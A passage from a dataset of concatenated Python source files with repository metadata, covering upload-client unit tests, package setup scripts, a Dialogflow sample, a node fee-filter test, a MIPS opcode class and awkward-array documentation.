stream = io.BytesIO(data)
metadata = {"name": "got-jokes.txt"}
transport = mock.Mock(spec=["request"])
location = ("http://test.invalid?upload_id=AACODBBBxuw9u3AA",)
response_headers = {"location": location}
post_response = _make_response(headers=response_headers)
transport.request.return_value = post_response
# Check resumable_url before.
assert upload._resumable_url is None
# Make request and check the return value (against the mock).
total_bytes = 100
assert total_bytes > len(data)
response = upload.initiate(
transport,
stream,
metadata,
BASIC_CONTENT,
total_bytes=total_bytes,
stream_final=False,
)
assert response is transport.request.return_value
# Check resumable_url after.
assert upload._resumable_url == location
# Make sure the mock was called as expected.
json_bytes = b'{"name": "got-jokes.txt"}'
expected_headers = {
"content-type": JSON_TYPE,
"x-upload-content-type": BASIC_CONTENT,
"x-upload-content-length": "{:d}".format(total_bytes),
}
transport.request.assert_called_once_with(
"POST",
RESUMABLE_URL,
data=json_bytes,
headers=expected_headers,
timeout=EXPECTED_TIMEOUT,
)
def test_initiate_w_custom_timeout(self):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
data = b"Knock knock who is there"
stream = io.BytesIO(data)
metadata = {"name": "got-jokes.txt"}
transport = mock.Mock(spec=["request"])
location = ("http://test.invalid?upload_id=AACODBBBxuw9u3AA",)
response_headers = {"location": location}
post_response = _make_response(headers=response_headers)
transport.request.return_value = post_response
upload.initiate(
transport,
stream,
metadata,
BASIC_CONTENT,
total_bytes=100,
timeout=12.6,
)
# Make sure timeout was passed to the transport
json_bytes = b'{"name": "got-jokes.txt"}'
expected_headers = {
"content-type": JSON_TYPE,
"x-upload-content-type": BASIC_CONTENT,
"x-upload-content-length": "{:d}".format(100),
}
transport.request.assert_called_once_with(
"POST",
RESUMABLE_URL,
data=json_bytes,
headers=expected_headers,
timeout=12.6,
)
@staticmethod
def _upload_in_flight(data, headers=None):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB, headers=headers)
upload._stream = io.BytesIO(data)
upload._content_type = BASIC_CONTENT
upload._total_bytes = len(data)
upload._resumable_url = "http://test.invalid?upload_id=not-none"
return upload
@staticmethod
def _chunk_mock(status_code, response_headers):
transport = mock.Mock(spec=["request"])
put_response = _make_response(status_code=status_code, headers=response_headers)
transport.request.return_value = put_response
return transport
def test_transmit_next_chunk(self):
data = b"This time the data is official."
upload = self._upload_in_flight(data)
# Make a fake chunk size smaller than 256 KB.
chunk_size = 10
assert chunk_size < len(data)
upload._chunk_size = chunk_size
# Make a fake 308 response.
response_headers = {"range": "bytes=0-{:d}".format(chunk_size - 1)}
transport = self._chunk_mock(
resumable_media.PERMANENT_REDIRECT, response_headers
)
# Check the state before the request.
assert upload._bytes_uploaded == 0
# Make request and check the return value (against the mock).
response = upload.transmit_next_chunk(transport)
assert response is transport.request.return_value
# Check that the state has been updated.
assert upload._bytes_uploaded == chunk_size
# Make sure the mock was called as expected.
payload = data[:chunk_size]
content_range = "bytes 0-{:d}/{:d}".format(chunk_size - 1, len(data))
expected_headers = {
"content-range": content_range,
"content-type": BASIC_CONTENT,
}
transport.request.assert_called_once_with(
"PUT",
upload.resumable_url,
data=payload,
headers=expected_headers,
timeout=EXPECTED_TIMEOUT,
)
def test_transmit_next_chunk_w_custom_timeout(self):
data = b"This time the data is official."
upload = self._upload_in_flight(data)
# Make a fake chunk size smaller than 256 KB.
chunk_size = 10
upload._chunk_size = chunk_size
# Make a fake 308 response.
response_headers = {"range": "bytes=0-{:d}".format(chunk_size - 1)}
transport = self._chunk_mock(
resumable_media.PERMANENT_REDIRECT, response_headers
)
# Make request and check the return value (against the mock).
upload.transmit_next_chunk(transport, timeout=12.6)
# Make sure timeout was passed to the transport
payload = data[:chunk_size]
content_range = "bytes 0-{:d}/{:d}".format(chunk_size - 1, len(data))
expected_headers = {
"content-range": content_range,
"content-type": BASIC_CONTENT,
}
transport.request.assert_called_once_with(
"PUT",
upload.resumable_url,
data=payload,
headers=expected_headers,
timeout=12.6,
)
def test_recover(self):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
upload._invalid = True # Make sure invalid.
upload._stream = mock.Mock(spec=["seek"])
upload._resumable_url = "http://test.invalid?upload_id=big-deal"
end = 55555
headers = {"range": "bytes=0-{:d}".format(end)}
transport = self._chunk_mock(resumable_media.PERMANENT_REDIRECT, headers)
ret_val = upload.recover(transport)
assert ret_val is transport.request.return_value
# Check the state of ``upload`` after.
assert upload.bytes_uploaded == end + 1
assert not upload.invalid
upload._stream.seek.assert_called_once_with(end + 1)
expected_headers = {"content-range": "bytes */*"}
transport.request.assert_called_once_with(
"PUT",
upload.resumable_url,
data=None,
headers=expected_headers,
timeout=EXPECTED_TIMEOUT,
)
def _make_response(status_code=http.client.OK, headers=None):
headers = headers or {}
return mock.Mock(
headers=headers, status_code=status_code, spec=["headers", "status_code"]
)
| 36.268786 | 88 | 0.61981 |
c885b530bddab76e560318fe6b252dcb82221293 | 547 | py | Python | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 8 | 2018-04-05T12:05:42.000Z | 2021-07-01T10:44:29.000Z | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 6 | 2018-04-05T10:36:31.000Z | 2021-08-08T08:06:13.000Z | release/python/setup.py | pbianchi/l2tester | 94e541fc08387555d2b81bd8dc447446c265afbb | [
"MIT"
] | 9 | 2018-04-04T19:15:49.000Z | 2021-08-07T10:17:10.000Z | #!/usr/bin/env python
from distutils.core import setup
setup(name='l2tester',
version='1.0',
author='Datacom',
url='https://github.com/datacom-teracom/l2tester',
description='l2tester is a set of tools projected to network traffic tests using the PC interfaces.',
scripts=['bin/shark', 'bin/sharknado'],
packages=['l2tester'],
include_package_data=True,
platforms='linux',
install_requires=['scapy', 'pyroute2<0.6.0', 'ipaddress'],
package_data={'l2tester': ['_l2tester.so']},
)
| 32.176471 | 107 | 0.650823 |
19e3deb62f92a6a6654d5f839c9e29648e127c60 | 1,060 | py | Python | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | null | null | null | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | 4 | 2017-03-03T14:57:01.000Z | 2017-06-19T14:06:43.000Z | python/dicebeard/skb_roll/beardeddie.py | DavidAmison/dicebeard | f864a54044dbe81ea5865c264b58a63888c08ac2 | [
"Unlicense"
] | 3 | 2017-02-04T18:37:06.000Z | 2019-06-20T09:24:02.000Z | import os
from pathlib import Path
from PIL import Image
import pyconfig
import pydice
class ImageNotSupported(Exception):
pass
class BeardedDie:
def __init__(self, die):
self.die = die
# Time to strap our to_image to pydice's Die
if pyconfig.get('dicebeard.images_path'):
pydice.dice.Die.images_path = Path(
pyconfig.get('dicebeard.images_path'))
else:
pydice.dice.Die.images_path = Path(
os.path.dirname(__file__)) / 'images'
def __getattr__(self, attr):
return getattr(self.die, attr)
def to_image(self):
'''Emits a PIL.Image of the die is possible'''
die_image_path = (self.images_path /
'd{}'.format(self.faces.stop-1) /
'{}.png'.format(self.result))
try:
return Image.open(str(die_image_path))
except FileNotFoundError:
raise ImageNotSupported(
'{} is not currently supported.'.format(self.name))
| 27.179487 | 71 | 0.580189 |
b96984e406bc6b26636241986fca1efb9d38135f | 1,581 | py | Python | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 171 | 2018-09-19T21:16:18.000Z | 2020-12-07T17:41:10.000Z | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 150 | 2018-09-25T14:04:28.000Z | 2020-12-09T21:45:43.000Z | samples/generated_samples/dialogflow_generated_dialogflow_v2_answer_records_list_answer_records_sync.py | rkdfc93/python-dialogflow | a59cff0298ef18674c0b4133ef0a6ab82e288920 | [
"Apache-2.0"
] | 75 | 2018-09-22T14:12:18.000Z | 2020-12-08T07:12:12.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListAnswerRecords
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_AnswerRecords_ListAnswerRecords_sync]
from google.cloud import dialogflow_v2
def sample_list_answer_records():
# Create a client
client = dialogflow_v2.AnswerRecordsClient()
# Initialize request argument(s)
request = dialogflow_v2.ListAnswerRecordsRequest(
parent="parent_value",
filter="filter_value",
)
# Make the request
page_result = client.list_answer_records(request=request)
# Handle the response
for response in page_result:
print(response)
# [END dialogflow_generated_dialogflow_v2_AnswerRecords_ListAnswerRecords_sync]
| 32.9375 | 85 | 0.762808 |
14179422041539eb35d5679af5880f0cbb9689ea | 5,187 | py | Python | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | 3 | 2021-05-14T20:46:07.000Z | 2022-03-07T13:06:28.000Z | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | null | null | null | test/functional/p2p_feefilter.py | danecoin/Danecoin | 73d21d335c11a8966c995b7e8c520c2b55695c04 | [
"MIT"
] | 1 | 2021-11-18T23:16:38.000Z | 2021-11-18T23:16:38.000Z | #!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from decimal import Decimal
from test_framework.messages import MSG_TX, MSG_WTX, msg_feefilter
from test_framework.p2p import P2PInterface, p2p_lock
from test_framework.test_framework import DanecoinTestFramework
from test_framework.util import assert_equal
from test_framework.wallet import MiniWallet
class FeefilterConn(P2PInterface):
feefilter_received = False
def on_feefilter(self, message):
self.feefilter_received = True
def assert_feefilter_received(self, recv: bool):
with p2p_lock:
assert_equal(self.feefilter_received, recv)
class TestP2PConn(P2PInterface):
def __init__(self):
super().__init__()
self.txinvs = []
def on_inv(self, message):
for i in message.inv:
if (i.type == MSG_TX) or (i.type == MSG_WTX):
self.txinvs.append('{:064x}'.format(i.hash))
def wait_for_invs_to_match(self, invs_expected):
invs_expected.sort()
self.wait_until(lambda: invs_expected == sorted(self.txinvs))
def clear_invs(self):
with p2p_lock:
self.txinvs = []
class FeeFilterTest(DanecoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
# We lower the various required feerates for this test
# to catch a corner-case where feefilter used to slightly undercut
# mempool and wallet feerate calculation based on GetFee
# rounding down 3 places, leading to stranded transactions.
# See issue #16499
# grant noban permission to all peers to speed up tx relay / mempool sync
self.extra_args = [[
"-minrelaytxfee=0.00000100",
"-mintxfee=0.00000100",
"-whitelist=noban@127.0.0.1",
]] * self.num_nodes
def run_test(self):
self.test_feefilter_forcerelay()
self.test_feefilter()
def test_feefilter_forcerelay(self):
self.log.info('Check that peers without forcerelay permission (default) get a feefilter message')
self.nodes[0].add_p2p_connection(FeefilterConn()).assert_feefilter_received(True)
self.log.info('Check that peers with forcerelay permission do not get a feefilter message')
self.restart_node(0, extra_args=['-whitelist=forcerelay@127.0.0.1'])
self.nodes[0].add_p2p_connection(FeefilterConn()).assert_feefilter_received(False)
# Restart to disconnect peers and load default extra_args
self.restart_node(0)
self.connect_nodes(1, 0)
def test_feefilter(self):
node1 = self.nodes[1]
node0 = self.nodes[0]
miniwallet = MiniWallet(node1)
# Add enough mature utxos to the wallet, so that all txs spend confirmed coins
miniwallet.generate(5)
node1.generate(100)
conn = self.nodes[0].add_p2p_connection(TestP2PConn())
self.log.info("Test txs paying 0.2 sat/byte are received by test connection")
txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000200'), from_node=node1)['wtxid'] for _ in range(3)]
conn.wait_for_invs_to_match(txids)
conn.clear_invs()
# Set a fee filter of 0.15 sat/byte on test connection
conn.send_and_ping(msg_feefilter(150))
self.log.info("Test txs paying 0.15 sat/byte are received by test connection")
txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000150'), from_node=node1)['wtxid'] for _ in range(3)]
conn.wait_for_invs_to_match(txids)
conn.clear_invs()
self.log.info("Test txs paying 0.1 sat/byte are no longer received by test connection")
txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00000100'), from_node=node1)['wtxid'] for _ in range(3)]
self.sync_mempools() # must be sure node 0 has received all txs
# Send one transaction from node0 that should be received, so that we
# we can sync the test on receipt (if node1's txs were relayed, they'd
# be received by the time this node0 tx is received). This is
# unfortunately reliant on the current relay behavior where we batch up
# to 35 entries in an inv, which means that when this next transaction
# is eligible for relay, the prior transactions from node1 are eligible
# as well.
txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00020000'), from_node=node0)['wtxid'] for _ in range(1)]
conn.wait_for_invs_to_match(txids)
conn.clear_invs()
self.sync_mempools() # must be sure node 1 has received all txs
self.log.info("Remove fee filter and check txs are received again")
conn.send_and_ping(msg_feefilter(0))
txids = [miniwallet.send_self_transfer(fee_rate=Decimal('0.00020000'), from_node=node1)['wtxid'] for _ in range(3)]
conn.wait_for_invs_to_match(txids)
conn.clear_invs()
if __name__ == '__main__':
FeeFilterTest().main()
| 41.496 | 123 | 0.687295 |
71167b3e74b07cf3aef35dfacf0d4e4cfb581a57 | 1,464 | py | Python | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | tests/conftest.py | lizardschool/wordbook | 843df3941c15ae88870874bdbf18cbf677b67e7f | [
"MIT"
] | null | null | null | """Tests configuration module."""
import sys
import os
import pytest
from alembic.command import upgrade, downgrade
from alembic.config import Config
# TODO: It shouldn't be there.
sys.path.insert(0, os.path.abspath('.'))
TESTDB = 'test_wordbook.db'
TESTDB_PATH = "{}".format(TESTDB)
@pytest.fixture()
def app():
"""Prepare test app."""
from wordbook import flaskapp
_app = flaskapp.create_app({})
return _app
@pytest.fixture(autouse=True)
def db(request, monkeypatch):
"""Session-wide test database."""
if os.path.exists(TESTDB_PATH):
os.unlink(TESTDB_PATH)
from wordbook.infra import config
from wordbook.infra import db
monkeypatch.setattr(config, 'SQLALCHEMY_ENGINE', 'sqlite:///' + TESTDB_PATH)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
_engine = create_engine(
'sqlite:///' + TESTDB_PATH,
echo=config.SQLALCHEMY_ECHO,
echo_pool=config.SQLALCHEMY_ECHO_POOL)
db_session = sessionmaker(bind=_engine)
def get_session():
return db_session()
monkeypatch.setattr(db, 'get_session', get_session)
alembic_config = Config('alembic.ini')
alembic_config.set_section_option('alembic', 'sqlalchemy.url', 'sqlite:///' + TESTDB_PATH)
def teardown():
downgrade(alembic_config, '18554c40c9e')
os.unlink(TESTDB_PATH)
upgrade(alembic_config, 'head')
request.addfinalizer(teardown)
return
| 25.241379 | 94 | 0.698087 |
1ce633ae70c7fc0f66934bb0ddd1d6ca8eb9d6b0 | 897 | py | Python | src/mathematics/combination/hkr_bonetrousle.py | joeyworld/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | 1 | 2019-02-11T09:18:14.000Z | 2019-02-11T09:18:14.000Z | src/mathematics/combination/hkr_bonetrousle.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | src/mathematics/combination/hkr_bonetrousle.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | import os
import sys
def bonetrousle(n, k, b):
initial_list = [i + 1 for i in range(b)]
min_sum = sum(initial_list)
max_sum = sum([k - i for i in range(b)])
if not min_sum <= n <= max_sum:
return [-1]
diff = n - min_sum
if not diff:
return initial_list
else:
for i in range(b):
box = k - 1 - i
current = b - 1 - i
limit = box - current
if diff <= limit:
initial_list[current] += diff
return initial_list
else:
initial_list[current] += limit
diff -= limit
if __name__ == '__main__':
t = int(input())
for t_itr in range(t):
nkb = input().split()
n = int(nkb[0])
k = int(nkb[1])
b = int(nkb[2])
result = bonetrousle(n, k, b)
print(' '.join(map(str, result)))
| 21.878049 | 46 | 0.478261 |
2fc5d707208a7996e4fad44e7e72cfcf5f361442 | 2,178 | py | Python | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | setup.py | 6un9-h0-Dan/cti-python-stix2 | 5a34d529a8f29e8a1bce510ebc99aa7e3d74e2ef | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from codecs import open
import os.path
from setuptools import find_packages, setup
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
VERSION_FILE = os.path.join(BASE_DIR, 'stix2', 'version.py')
def get_version():
with open(VERSION_FILE) as f:
for line in f.readlines():
if line.startswith('__version__'):
version = line.split()[-1].strip('"')
return version
raise AttributeError("Package does not have a __version__")
def get_long_description():
with open('README.rst') as f:
return f.read()
setup(
name='stix2',
version=get_version(),
description='Produce and consume STIX 2 JSON content',
long_description=get_long_description(),
long_description_content_type='text/x-rst',
url='https://oasis-open.github.io/cti-documentation/',
author='OASIS Cyber Threat Intelligence Technical Committee',
author_email='cti-users@lists.oasis-open.org',
maintainer='Chris Lenk, Emmanuelle Vargas-Gonzalez',
maintainer_email='clenk@mitre.org, emmanuelle@mitre.org',
license='BSD',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Security',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords='stix stix2 json cti cyber threat intelligence',
packages=find_packages(exclude=['*.test', '*.test.*']),
install_requires=[
'pytz',
'requests',
'simplejson',
'six>=1.13.0',
'stix2-patterns>=1.2.0',
],
project_urls={
'Documentation': 'https://stix2.readthedocs.io/',
'Source Code': 'https://github.com/oasis-open/cti-python-stix2/',
'Bug Tracker': 'https://github.com/oasis-open/cti-python-stix2/issues/',
},
extras_require={
'taxii': ['taxii2-client>=2.2.1'],
'semantic': ['haversine', 'rapidfuzz'],
},
)
| 32.507463 | 80 | 0.623049 |
2e4397f955366349c9bc4d8a2d7aa50a6202d117 | 3,175 | py | Python | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | chb/mips/opcodes/MIPSInsertBitField.py | orinatic/CodeHawk-Binary | 8b4fd728213e629736d5ece840ea3b43cea53f30 | [
"MIT"
] | null | null | null | # ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020-2021 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import cast, List, Sequence, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.mips.MIPSDictionaryRecord import mipsregistry
from chb.mips.MIPSOpcode import MIPSOpcode, simplify_result
from chb.mips.MIPSOperand import MIPSOperand
import chb.simulation.SimUtil as SU
import chb.simulation.SimValue as SV
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
from chb.mips.MIPSDictionary import MIPSDictionary
from chb.mips.simulation.MIPSimulationState import MIPSimulationState
@mipsregistry.register_tag("ins", MIPSOpcode)
class MIPSInsertBitField(MIPSOpcode):
""" INS rt, rs, pos, size
Merge a right-justified bit field from rs into a specified field in rt.
args[0]: index of rt in mips dictionary
args[1]: index of rs in mips dictionary
args[2]: position (pos)
args[3]: size
"""
def __init__(
self,
mipsd: "MIPSDictionary",
ixval: IndexedTableValue) -> None:
MIPSOpcode.__init__(self, mipsd, ixval)
@property
def operands(self) -> Sequence[MIPSOperand]:
return [self.mipsd.mips_operand(i) for i in self.args[:2]]
def annotation(self, xdata: InstrXData) -> str:
"""xdata format: a:vxx .
vars[0]: lhs (rt)
xprs[0]: rhs (rs)
xprs[1]: rhs (simplified)
"""
lhs = str(xdata.vars[0])
result = str(xdata.xprs[1])
return (
lhs
+ " := insert_bit_field("
+ result
+ ", "
+ str(self.args[2])
+ ", "
+ str(self.args[3])
+ ")")
| 34.89011 | 80 | 0.639055 |
51b83b9655dc2bace81532c3eeba48f09a9fc553 | 176,311 | py | Python | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | # BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import numbers
import json
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import awkward as ak
np = ak.nplike.NumpyMetadata.instance()
@ak._connect._numpy.implements("copy")
def copy(array):
"""
Returns a deep copy of the array (no memory shared with original).
This is identical to `np.copy` and `copy.deepcopy`.
It's only useful to explicitly copy an array if you're going to change it
in-place. This doesn't come up often because Awkward Arrays are immutable.
That is to say, the Awkward Array library doesn't have any operations that
change an array in-place, but the data in the array might be owned by another
library that can change it in-place.
For example, if the array comes from NumPy:
>>> underlying_array = np.array([1.1, 2.2, 3.3, 4.4, 5.5])
>>> wrapper = ak.Array(underlying_array)
>>> duplicate = ak.copy(wrapper)
>>> underlying_array[2] = 123
>>> underlying_array
array([ 1.1, 2.2, 123. , 4.4, 5.5])
>>> wrapper
<Array [1.1, 2.2, 123, 4.4, 5.5] type='5 * float64'>
>>> duplicate
<Array [1.1, 2.2, 3.3, 4.4, 5.5] type='5 * float64'>
There is an exception to this rule: you can add fields to records in an
#ak.Array in-place. However, this changes the #ak.Array wrapper without
affecting the underlying layout data (it *replaces* its layout), so a
shallow copy will do:
>>> original = ak.Array([{"x": 1}, {"x": 2}, {"x": 3}])
>>> shallow_copy = copy.copy(original)
>>> shallow_copy["y"] = original.x**2
>>> shallow_copy
<Array [{x: 1, y: 1}, ... y: 4}, {x: 3, y: 9}] type='3 * {"x": int64, "y": int64}'>
>>> original
<Array [{x: 1}, {x: 2}, {x: 3}] type='3 * {"x": int64}'>
This is key to Awkward Array's efficiency (memory and speed): operations that
only change part of a structure re-use pieces from the original ("structural
sharing"). Changing data in-place would result in many surprising long-distance
changes, so we don't support it. However, an #ak.Array's data might come from
a mutable third-party library, so this function allows you to make a true copy.
"""
layout = ak.operations.convert.to_layout(
array,
allow_record=True,
allow_other=False,
)
return ak._util.wrap(layout.deep_copy(), ak._util.behaviorof(array))
def mask(array, mask, valid_when=True, highlevel=True, behavior=None):
"""
Args:
array: Data to mask, rather than filter.
mask (array of booleans): The mask that overlays elements in the
`array` with None. Must have the same length as `array`.
valid_when (bool): If True, True values in `mask` are considered
valid (passed from `array` to the output); if False, False
values in `mask` are considered valid.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array for which
output[i] = array[i] if mask[i] == valid_when else None
Unlike filtering data with #ak.Array.__getitem__, this `output` has the
same length as the original `array` and can therefore be used in
calculations with it, such as
[universal functions](https://docs.scipy.org/doc/numpy/reference/ufuncs.html).
For example, with an `array` like
ak.Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
with a boolean selection of `good` elements like
>>> good = (array % 2 == 1)
>>> good
<Array [False, True, False, ... False, True] type='10 * bool'>
could be used to filter the original `array` (or another with the same
length).
>>> array[good]
<Array [1, 3, 5, 7, 9] type='5 * int64'>
However, this eliminates information about which elements were dropped and
where they were. If we instead use #ak.mask,
>>> ak.mask(array, good)
<Array [None, 1, None, 3, ... None, 7, None, 9] type='10 * ?int64'>
this information and the length of the array is preserved, and it can be
used in further calculations with the original `array` (or another with
the same length).
>>> ak.mask(array, good) + array
<Array [None, 2, None, 6, ... 14, None, 18] type='10 * ?int64'>
In particular, successive filters can be applied to the same array.
Even if the `array` and/or the `mask` is nested,
>>> array = ak.Array([[[0, 1, 2], [], [3, 4], [5]], [[6, 7, 8], [9]]])
>>> good = (array % 2 == 1)
>>> good
<Array [[[False, True, False], ... [True]]] type='2 * var * var * bool'>
it can still be used with #ak.mask because the `array` and `mask`
parameters are broadcasted.
>>> ak.mask(array, good)
<Array [[[None, 1, None], ... None], [9]]] type='2 * var * var * ?int64'>
See #ak.broadcast_arrays for details about broadcasting and the generalized
set of broadcasting rules.
Another syntax for
ak.mask(array, array_of_booleans)
is
array.mask[array_of_booleans]
(which is 5 characters away from simply filtering the `array`).
"""
def getfunction(inputs):
layoutarray, layoutmask = inputs
if isinstance(layoutmask, ak.layout.NumpyArray):
m = ak.nplike.of(layoutmask).asarray(layoutmask)
if not issubclass(m.dtype.type, (bool, np.bool_)):
raise ValueError(
"mask must have boolean type, not "
"{0}".format(repr(m.dtype)) + ak._util.exception_suffix(__file__)
)
bytemask = ak.layout.Index8(m.view(np.int8))
return lambda: (
ak.layout.ByteMaskedArray(
bytemask, layoutarray, valid_when=valid_when
).simplify(),
)
else:
return None
layoutarray = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
layoutmask = ak.operations.convert.to_layout(
mask, allow_record=True, allow_other=False
)
behavior = ak._util.behaviorof(array, mask, behavior=behavior)
out = ak._util.broadcast_and_apply(
[layoutarray, layoutmask],
getfunction,
behavior,
numpy_to_regular=True,
right_broadcast=False,
pass_depth=False,
)
assert isinstance(out, tuple) and len(out) == 1
return ak._util.maybe_wrap(out[0], behavior, highlevel)
def num(array, axis=1, highlevel=True, behavior=None):
"""
Args:
array: Data containing nested lists to count.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array of integers specifying the number of elements at a
particular level.
For instance, given the following doubly nested `array`,
ak.Array([[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]
],
[],
[
[7.7],
[8.8, 9.9]]
])
The number of elements in `axis=1` is
>>> ak.num(array, axis=1)
<Array [4, 0, 2] type='3 * int64'>
and the number of elements at the next level down, `axis=2`, is
>>> ak.num(array, axis=2)
<Array [[3, 0, 2, 1], [], [1, 2]] type='3 * var * int64'>
The `axis=0` case is special: it returns a scalar, the length of the array.
>>> ak.num(array, axis=0)
3
This function is useful for ensuring that slices do not raise errors. For
instance, suppose that we want to select the first element from each
of the outermost nested lists of `array`. One of these lists is empty, so
selecting the first element (`0`) would raise an error. However, if our
first selection is `ak.num(array) > 0`, we are left with only those lists
that *do* have a first element:
>>> array[ak.num(array) > 0, 0]
<Array [[1.1, 2.2, 3.3], [7.7]] type='2 * var * float64'>
To keep a placeholder (None) in each place we do not want to select,
consider using #ak.mask instead of a #ak.Array.__getitem__.
>>> ak.mask(array, ak.num(array) > 0)[:, 0]
